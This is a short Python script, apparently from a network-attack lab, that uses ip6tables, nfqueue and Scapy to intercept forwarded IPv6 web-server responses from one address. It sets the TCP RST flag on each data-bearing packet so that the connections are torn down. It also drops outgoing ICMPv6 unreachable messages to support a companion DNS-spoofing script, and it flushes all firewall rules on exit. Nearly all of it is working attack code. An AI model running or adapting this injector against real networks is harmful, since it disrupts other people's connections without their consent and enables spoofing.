#!/usr/bin/env python

import nfqueue
from scapy.all import *
import os
import socket
import re
import urllib

# intercept web server responses
os.system('ip6tables -A FORWARD -s 2604:5f00:ffff:fe00::5353 -p tcp --sport 80 -j NFQUEUE --queue-num 1 ')

# os.system('ip6tables -A INPUT -p tcp --dport 80 -j NFQUEUE --queue-num 1 ')

# needed for dns-resp-v6.py: 
os.system('ip6tables -A OUTPUT -p ipv6-icmp -m icmp6 --icmpv6-type 1/4 -j DROP')

# see comment in nfq-pass-all if you see TypeError regarding 2 arguments passed to callback;
#  change signature to callback(i, payload)
def callback(payload):
    data = payload.get_data()
    pkt = IPv6(data)
    print pkt.summary()

    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        # copy the packet
        r = pkt.copy()
        # replace flags with RST
        r[TCP].flags |= 0x4 
        r[TCP].chksum   = None
        r[IPv6].chksum  = None

        # print "Sending RST: " + r.summary()
        # send( r )
        # payload.set_verdict(nfqueue.NF_ACCEPT) # approve original packet

        # add RST flag to the packet
        print "Sending RST on: " + r.summary()
        payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(r), len(r)) 

    else:
        payload.set_verdict(nfqueue.NF_ACCEPT)


def main():
    q = nfqueue.queue()
    q.open()
    q.unbind(socket.AF_INET)
    q.bind(socket.AF_INET)   # callback won't be called without this
    q.set_callback(callback)
    q.create_queue(1)
    try:
        q.try_run() # Main loop
    except KeyboardInterrupt:
        q.unbind(socket.AF_INET)
        q.close()
        print "Cleaning up iptables" # this removes ALL rules, excessive
        os.system('ip6tables -F')
        os.system('ip6tables -X')

main()